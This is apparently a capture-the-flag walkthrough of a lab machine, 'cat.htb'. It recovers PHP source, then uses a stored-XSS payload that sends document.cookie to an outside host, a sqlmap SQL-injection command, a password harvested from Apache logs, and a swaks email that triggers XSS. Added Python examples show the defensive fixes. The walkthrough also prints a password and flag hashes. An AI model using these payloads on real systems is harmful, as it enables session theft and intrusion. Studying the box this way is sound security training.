Difficulty: Medium
IP: 10.129.234.87
OS: Linux
Category: Web / SQLi / XSS / PrivEsc
Status: ✅ Done
nmap cat.htb
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
.git/ folder discovered → used git-dumper to recover the full PHP source
view_cat.php has stored XSS in username (reflected into the DOM without escaping):
<img src=1 onerror=this.src="http://10.10.xx.xx/?ccc="+encodeURIComponent(document.cookie)>
accept_cat.php: vulnerable catName param, concatenated straight into the query string:
$sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
config.php → file-based DB at /databases/cat.db (SQLite)
sqlmap to extract user hashes:
sqlmap -u "http://cat.htb/accept_cat.php" --cookie="PHPSESSID=..." --data="catId=1&catName=123" -p catName --dbms=SQLite --level=5
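The two web bugs above come from the same root cause: user input reaches SQL text and HTML output unchanged. The following is an added example written for this writeup, not the box's PHP: it rebuilds the accept_cat.php INSERT in Python/sqlite3 beside a parameterized version, and adds an escaping renderer for the username that view_cat.php echoes into the DOM. The table and column names (accepted_cats, name) come from the recovered source; the in-memory database, the function names and the sample inputs are constructed here.

```python
"""Added example (not the box's PHP): string-concatenated INSERT vs. a bound
parameter, plus HTML escaping on output. Table/column names are from the
writeup; the in-memory DB and sample values are constructed."""
import html
import sqlite3


def new_db() -> sqlite3.Connection:
    # Constructed stand-in for /databases/cat.db: only the table the writeup names.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accepted_cats (name TEXT)")
    return conn


def insert_cat_unsafe(conn: sqlite3.Connection, cat_name: str) -> None:
    # Mirrors $sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
    # the input is spliced into the SQL text, so a quote in it changes the query.
    conn.execute(f"INSERT INTO accepted_cats (name) VALUES ('{cat_name}')")


def insert_cat_safe(conn: sqlite3.Connection, cat_name: str) -> None:
    # Hardened form: the value travels as a bound parameter, never as SQL text.
    conn.execute("INSERT INTO accepted_cats (name) VALUES (?)", (cat_name,))


def stored_names(conn: sqlite3.Connection) -> list:
    return [row[0] for row in conn.execute("SELECT name FROM accepted_cats ORDER BY rowid")]


def render_username(username: str) -> str:
    # view_cat.php reflects the username into the page; escaping on output turns
    # '<', '>', '"' and "'" into entities, so an <img onerror=...> payload is inert text.
    return f"<td>{html.escape(username, quote=True)}</td>"


def demo() -> dict:
    quoted = "Tom O'Malley"  # a legitimate name that happens to contain a quote
    conn = new_db()
    unsafe_error = None
    try:
        insert_cat_unsafe(conn, quoted)
    except sqlite3.OperationalError as e:
        # The query text itself broke on the quote: that is the injection surface.
        unsafe_error = str(e)
    insert_cat_safe(conn, quoted)
    return {
        "unsafe_raised": unsafe_error is not None,
        "safe_stored": stored_names(conn),
        "escaped": render_username("<img src=1 onerror=alert(1)>"),
    }


if __name__ == "__main__":
    print(demo())
```

The unsafe path raises a syntax error on an ordinary apostrophe, which is the same mechanism sqlmap leans on; the parameterized path stores the name verbatim. Escaping belongs at the point of output, not on the way into the database, so the stored value stays usable for other consumers.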
/var/log/apache2/access.log: the login form sent credentials as GET parameters, so they sit in the request log
cat /var/log/apache2/access.log | grep axel
GET /join.php?loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q
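Credentials in a GET query string end up in every access log and proxy log on the path, which is what made the axel password recoverable. As an added example (not part of the original notes), the scanner below parses Apache common/combined log lines and reports requests whose query string carries a sensitive-looking parameter, recording the parameter name and value length but never the value itself. The log lines, IPs and passwords in SAMPLE_LOG are constructed; the SENSITIVE name list is an assumption to tune per application.

```python
"""Added example (not from the writeup): flag credentials submitted in URL
query strings in Apache access-log lines. Sample lines are constructed."""
import re
from urllib.parse import parse_qsl, urlsplit

# Apache common/combined prefix: client IP ... "METHOD /path?query HTTP/x"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

# Parameter names (compared lowercased) that should never travel in a URL. Assumed list.
SENSITIVE = {"password", "passwd", "pwd", "pass", "loginpassword", "token", "secret", "apikey"}

# Constructed sample log; addresses and secrets are placeholders, not values from the box.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2025:10:00:01 +0000] "GET /join.php?loginUsername=axel&loginPassword=EXAMPLE-PASSWORD HTTP/1.1" 302 -
10.10.14.5 - - [01/Jan/2025:10:00:02 +0000] "GET /view_cat.php?id=3 HTTP/1.1" 200 1542
10.10.14.9 - - [01/Jan/2025:10:00:03 +0000] "POST /accept_cat.php HTTP/1.1" 200 12
10.10.14.9 - - [01/Jan/2025:10:00:04 +0000] "GET /api/?apiKey=ABC123 HTTP/1.1" 200 40
"""


def find_credential_leaks(log_text: str) -> list:
    """One finding per request line whose query string carries a sensitive parameter.
    Values are deliberately not copied into the finding, only names and lengths,
    so the report itself does not become a second copy of the secret."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line we understand
        parts = urlsplit(m["target"])
        hits = [
            (k, len(v))
            for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if k.lower() in SENSITIVE
        ]
        if hits:
            findings.append(
                {
                    "ip": m["ip"],
                    "method": m["method"],
                    "path": parts.path,
                    "params": [k for k, _ in hits],
                    "value_lengths": [n for _, n in hits],
                }
            )
    return findings


if __name__ == "__main__":
    for f in find_credential_leaks(SAMPLE_LOG):
        print(f"{f['ip']} {f['method']} {f['path']} leaks {', '.join(f['params'])}")
```

The POST to accept_cat.php produces no finding because request bodies are not logged; that is the fix on the application side (submit the login form with POST), while on the logging side the existing log should be scrubbed or rotated out once such a leak is found, since the password is already at rest on disk.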
ssh rosa@cat.htb -L 3000:127.0.0.1:3000
/var/mail/axel: send an email to jobert to trigger the XSS
swaks --to "jobert@localhost" --from "axel@localhost" --header "Click" --body "http://localhost:3000/axel/xss" --server localhost
index.php → password inside
cat user.txt
56726c7c53163f6b2cddd30da152a32d
cat root.txt
b6503818144bada3cd5c62210f1427c7